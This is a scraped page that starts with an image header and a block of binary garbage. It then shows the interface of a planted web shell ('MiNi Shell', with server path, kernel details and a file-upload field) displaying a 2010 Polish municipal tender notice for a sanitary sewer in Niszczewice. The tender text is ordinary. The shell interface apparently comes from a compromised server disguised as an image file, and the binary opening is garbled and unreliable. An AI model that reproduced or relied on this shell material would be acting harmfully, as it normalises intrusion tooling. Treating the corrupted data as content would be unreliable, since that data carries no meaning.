JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100304/60176-N-2010.html

<p class="kh_header"><b>Złotniki Kujawskie: Budowa kanalizacji sanitarnej w Niszczewicach</b><br>
<b>Numer ogłoszenia: 60176 - 2010; data zamieszczenia: 04.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Powstańców Wlkp. 6, 88-180 Złotniki Kujawskie, woj. kujawsko-pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotnikikuj.cc.</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zlotnikikuj.ires.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w Niszczewicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Przedmiotem zamówienia jest  budowa kanalizacji sanitarnej wraz z przykanalikami w miejscowości Niszczewice z przesyłem ścieków do istniejącej oczyszczalni ścieków w Mierzwinie.
Zakres zamówienia obejmuje:                                                                                                      - kanały grawitacyjne z PCV O 200 mm 	- 1898,0 m,
- przykanaliki PCV 160 mm 84 szt;              -   800,0 m
- sieciowe przepompownie ścieków 		-       2,0 szt
- rurociąg tłoczny PE 110 mm		- 1656,0 m
- rurociąg tłoczny PE   90 mm		-   314,0 m
- rurociąg tłoczny PE   63 mm		- 1872,5 m
- rurociąg tłoczny PE   50 mm		- 1161,5 m
- rurociąg tłoczny PE   40 mm		-   614,0 m
- przyłącza tłoczne PE 40 mm 		-   751,0 m
- przydomowe przepompownie ścieków	-     31,0 szt
1.2.Kanały sanitarne  - zaprojektowano wykonanie kanałów z rur kanalizacyjnych z PCV 200/5.9 mm o nominalnej sztywności obwodowej SN 8 (Kpa). Na odcinku 267,0 m przewidziany jest przewiert sterowany  z rur PEHD 200/11,9 mm SDR 17 PN klasy PE 100. Łączenie rur poprzez zgrzewanie elektrooporowe .
1.3.Przykanaliki sanitarne  - przyłącza kanalizacji sanitarnej do poszczególnych posesji zaprojektowano z rur kanalizacyjnych PCV 160/4.7 mm o nominalnej sztywności obwodowej SN 8 (Kpa). Połączenie przykanalika z kanałem głównym poprzez studnie rewizyjne oraz  w miejscach przedstawionych w dokumentacji poprzez wpust boczny (trójnik skośny). Zakończenie przyłącza na posesjinależy wykonać studzienką rewizyjną PCV 315 mm przykrytą w zależności od lokalizacji stożkiem betonowym lub włazem przejazdowym.
1.4.Przepompownie ścieków - dla przetłoczenia ścieków zaprojektowano wykonanie dwóch  sieciowych przepompowni ścieków: PS-1 i PS-2.Przewidziano zastosowanie kompletnych przepompowni ze zbiornikiem prefabrykowanym  z polimerobetonu, wyposażonych w zatapialne agregaty pompowe. Pompownie mają być kompletnym obiektem wyposażonym  w wewnętrzne instalacje i armaturę  hydrauliczną  oraz automatyczny system sterowania elektrycznego pracą pomp.Przepompownie wyposażone w  dwa agregaty pompowe pracujące naprzemiennie, zamontowane stacjonarnie na poziomie mokrym. Na stałe w dnie pompowni zainstalować stopy sprzęgające. Pompa opuszczana za pomocą żurawika po prowadnicach łączy się automatycznie ze stopą  i automatycznie rozłącza, kiedy jest podnoszona. Pompownie wyposażone  w wentylację grawitacyjną  oraz oświetlenie lampa elektryczną.
Przepompownia PS-1  wydajność pompy w punkcie pracy 4,2 l/s, wys.podn. 5,9 m.
Przepompownia PS-2 wydajność pompy w punkcie pracy 6,6 l/s , wys. podn.19,04 m.
Teren wokół zbiornika przepompowni należy ogrodzić i wyłożyć kostką betonową ponadto należy wykonać zewnętrzne oświetlenie terenu przepompowni.
Układ sterowania przepompowni- praca przepompowni ścieków ma się odbywać automatycznie z możliwością sterowania ręcznego:
- szafka sterownicza do zabudowy zewnętrznej o IP53,
- zabezpieczenie przed zanikiem faz zasilających oddzielnie dla każdej pompy, 
- sterowanie za pomocą pływakowych  regulatorów poziomu,
- system monitoringu  stanów pracy i sterowania pracą grupy przepompowni z zastosowaniem 
   modemu GSM przy wykorzystaniu sieci telefonii komórkowej do dyspozycji w 
   oczyszczalni ścieków,
- w zakresie monitoringu należy wykonać układ przekazywania sygnałów pracy   
   przepompowni:
   * stany awaryjne zamontowanych urządzeń - pomp,
   * stany minimalne i maksymalne poziomu ścieków ,
   * stan suchobiegu,
   * zanik napięcia,
   * włamanie
1.5.Rurociągi tłoczne - zaprojektowano z rur ciśnieniowych  PE 80:
- 110/6,6 mm SDR 17 PN 8 - T-2
- 90/5,4 mm SDR 17 PN 8- T-1
  z rur ciśnieniowych PE 100 ( rurociągi tłoczne T-3, T-4,, T-5):
- 63/3,8 mm SDR 17 PN 10
- 50/3,0 mm SDR 17 PN 10
- 40/2,4 mm SDR 17 PN 10
1.6.Przydomowe  przepompownie  ścieków - pompownie ze zbiornikiem z PE , średnicy 0,8 m wyposażone w zatapialne pompy wyporowe z rozdrabniaczem części stałych PWSE-N. Typ pompowni jest kompletnym obiektem wyposażonym w wewnętrzne instalacje i armaturę hydrauliczną oraz automatyczny system sterowania elektrycznego pracą pompy.
Sterowanie pracą pomp za pomocą pływakowego układu sterującego i sterownika umieszczonego w skrzynce na zewnątrz pompowni.Dla zapewnienia wentylacji pompownia ma posiadać kominek wentylacyjny.
Uwaga: Wykonawca z upoważnienia Inwestora  wystąpi do Rejonu Energetycznego w Inowrocławiu  z wnioskiem o wydanie warunków przyłączenia  celem wykonania w/w przyłączy ( i dokona opłaty przyłączeniowej).W ramach niniejszego zamówienia należy wykonać dla poszczególnych przepompowni WLZ oraz uziom ochronny.WLZ dla przepompowni z pompami 3-fazowymi wykonać kablami YKY 3x2,5 mm 2 .Kable dla poszczególnych przepompowni wykonać od miejsc istniejących przyłączy w danym gospodarstwie.
1.7.Uzbrojenie kanałów i rurociągów - kanały grawitacyjne przewiduje się wyposażyć w studzienki rewizyjne zbiorcze z kręgów betonowych O 1200 mm z dnem betonowym monolitycznym, które należy wyposażyć we włazy żeliwne O 600 mm typu ciężkiego.
Stosować płyty pokrywowe typu PP z żelbetowymi pierścieniami odciążającymi. Studzienki przelotowe na kanałach grawitacyjnych należy wykonać jako  nieprzełazowe PCV 425 mm z włazami przejazdowymi. 
1.9.  Ponadto wykonawca w ramach przedmiotu zamówienia  skalkuluje  w cenie ofertowej i bez dodatkowego wynagrodzenia  zobowiązuje się  do:
1.9.1.Geodezyjnej obsługi inwestycji polegającej na geodezyjnym wytyczeniu trasy kanalizacji sanitarnej wraz z obiektami na kanalizacji, geodezyjnej obsłudze robót, wykonaniu geodezyjnej dokumentacji  powykonawczej,
1.9.2. Wykonawca z upoważnienia Inwestora  wystąpi do Rejonu Energetycznego w Inowrocławiu  z wnioskiem o wydanie warunków przyłączenia  dla pompowni zagrodowych celem wykonania w/w przyłączy oraz  dokona opłaty przyłączeniowej.
        1.9.3.Wykonanie planu Bios na podstawie wytycznych zawartych w projekcie,
         1.9.4.Wniesienie opłaty za zajęcie pasa drogowego na czas  prowadzenia robót,
         1.9.5.Wykonania niezbędnych badań, prób i pomiarów w celu sprawdzenia prawidłowości 
          wykonanych robót,
 1.9.6.Zapewnienia dostępu do posesji ich mieszkańcom i użytkownikom podczas prowadzenia robót,
1.9.7.odtworzenia nawierzchni dróg i chodników  w przypadku ich zniszczenia na skutek prowadzonych robót,
1.9.8.Odtworzenia kamieni granicznych w przypadku ich naruszenia,
1.9.9.naprawy ogrodzeń oraz innych uszkodzeń istniejących obiektów i elementów zagospodarowania terenu, spowodowanych prowadzonymi robotami budowlanymi,
       1.9.11.Opracowana przez Wykonawcę dokumentacja powykonawcza zawierać powinna  
        wszystkie zmiany w stosunku do projektu budowlano - wykonawczego  wprowadzone  
        podczas realizacji inwestycji.
       1.9.12Wykonawca pokrywa wszystkie koszty składowania i prawidłowego   zabezpieczenia    
        materiałów przeznaczonych do wbudowania.Zamawiający nie zabezpiecza organizacji   
        zaplecza budowy w tym terenu pod jego lokalizację, pomieszczeń( biurowych, socjalnych,   
        sanitarnych), doprowadzenia   mediów w tym wody i energii elektrycznej. Wszelkie koszty  
        związane  z wykonaniem    i  utrzymaniem zaplecza pokrywa Wykonawca.
        1.9.13.Wykonawca pokrywa koszty wywozu i utylizacji odpadów powstałych w wyniku 
        prowadzonych prac budowlanych oraz socjalnych.
        1.9.14.Sporządzenie kosztorysu powykonawczego robót po ich zakończeniu.
        1.9.15.Wykonawca pokrywa wszystkie koszty związane z wystąpieniem awarii powstałych     
             w wyniku prac budowlanych .
1.9.16. Wymagania  przy realizacji i rozliczeniu przedmiotu zamówienia
-   Roboty budowlane należy wykonać zgodnie z projektem budowlanym, instytucjami     
     nadzorującymi sieci  podziemne, drogi  ,obowiązującymi  normami , planem BIOS, 
     przepisami BHP oraz sztuką i wiedzą budowlaną.
-   Roboty budowlane należy prowadzić przy zabezpieczeniu ciągłości ruchu pieszego   
     kołowego, oraz umożliwiając dojazd  do posesji.
-   Wbudowane materiały powinny być użyte zgodnie z przeznaczeniem  i być dopuszczone-    
     do obrotu. Powinny posiadać A.T. deklarację zgodności oraz stosowne atesty.
 -  Wykonawca dostarczy Zamawiającemu aprobaty techniczne dla materiałów przed  ich    
   wbudowaniem.
 -   Do wbudowania dopuszcza się  tylko materiały nieuszkodzone.
 -   Roboty budowlane w rejonie istniejącego uzbrojenia podziemnego należy wykonać pod  
   nadzorem użytkownika i zgodnie z jego zaleceniami.
 -   Wszystkie badania i pomiary wykonane powinny być przez osoby uprawnione .
   - Dokumenty rozliczeniowe powinny zawierać każdorazowo deklaracje zgodności, atesty
     dla partii materiałów wbudowanych na danym odcinku i wyniki badań geologicznych.    
  -  W przypadku wystąpienia awarii wynikłej z prowadzonych przez Wykonawcę robót,  zobowiązany on jest do udzielenia informacji oraz pomocy przy jej usuwaniu.
  -  Wykonawca odpowiada za wszelkie szkody powstałe w czasie prowadzenia prac    
      budowlanych, lub będących ich konsekwencją oraz które wystąpiły na terenie budowy, 
      lub poza nim w przypadku udowodnienia  zależności przyczynowo  skutkowej.     
1.9.17.Szczegółowy zakres zamówienia zawiera dokumentacja projektowa,specyfikacja techniczna wykonania i odbioru robót, przedmiar robót i wymagania zawarte w siwz,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.11.12.49-2, 45.23.24.23-3, 45.23.31.42-6, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 44.000,00 zł    /słownie: czterdzieści cztery tysiące złotych/przed upływem terminu składania ofert tj. do dnia 19.03.2010 r. do godz.11:00.Wadium wnoszone w pieniądzu musi być wpłacone przelewem na rachunek bankowy Zamawiającego - Bank Spółdzielczy Bydgoszcz Oddział  Złotniki Kujawskie konto  depozytowe Nr 32 81 42 10 59 0000 19  35 2000 0004  z dopiskiem Przetarg na kanalizację  
sanitarną w Niszczewicach.Wadium wnoszone w pieniądzu jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku  Zamawiającego tj. 19.03.2010 r. do godz.11:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   przynajmniej dwa zadania inwestycyjne polegające na budowie lub przebudowie kanalizacji sanitarnej o wartości robót minimum 1.500.000,00 zł brutto każde         
            lub
trzy zadania inwestycyjne polegające na budowie lub przebudowie  kanalizacji sanitarnej  o 
wartości nie mniejszej niż 1.000.000,00 zł brutto  każde,  załączy dokumenty potwierdzające, 
że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca  : dysponowania odpowiednim potencjałem 
technicznym niezbędnym do wykonania zamówienia- wymagania minimalne:
 1) koparki o poj. łyżki min. 0,25 m3 - 2 szt
 2) koparko-ładowarka min. 55 Kw - 2 szt
 3) środkami transportowymi - samochody ciężarowe o ładowności min. 6 ton - 2 szt,
 4) zagęszczarki/ ubijaki do zagęszczenia gruntu - 2 szt,
 5) zgrzewarka do rur  PE, PEHD - wymagane min 2
 6) żuraw samochodowy 5-6 t - 2 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie osobami zdolnymi do  wykonania zamówienia-wymagania minimalne:
1) dwie czteroosobowe brygady robocze,
2) podmiot upoważniony do obsługi geodezyjnej,
3) osoba przewidziana do pełnienia funkcji kierownika budowy posiadająca  
    odpowiednie uprawnienia budowlane o specjalności sanitarnej, będąca członkiem  
    Okręgowej Izby Inżynierów Budownictwa - legitymującymi się nie mniejszymi niż 
    3 letnim stażem zawodowym,
4) osoba przewidziana do pełnienia funkcji kierownika robót w zakresie branży  
   elektrycznej posiadająca uprawnienia budowlane o specjalności elektrycznej  
     upoważniające do kierowania robotami elektrycznymi , będącą członkiem 
     Okręgowej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiadają dostęp lub dysponują środkami finansowymi w kwocie nie mniejszej niż      
    800.000,00 zł. 
 2) są ubezpieczeni od odpowiedzialności  cywilnej w zakresie prowadzonej działalności  na kwotę nie mniejszą niż 1.000.000,00  zł  na czas wykonania zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotnikikuj.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Złotniki Kujawskie ul.Powstańców Wielkopolskich 6 , 88-180
       Złotniki Kujawskie.
        Zamawiający pobiera opłatę za materiały przetargowe w wersji papierowej w wysokości 150 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 11:00, miejsce: Urząd Gminy Złotniki Kujawskie
ul.Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie ,I piętro pok.27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
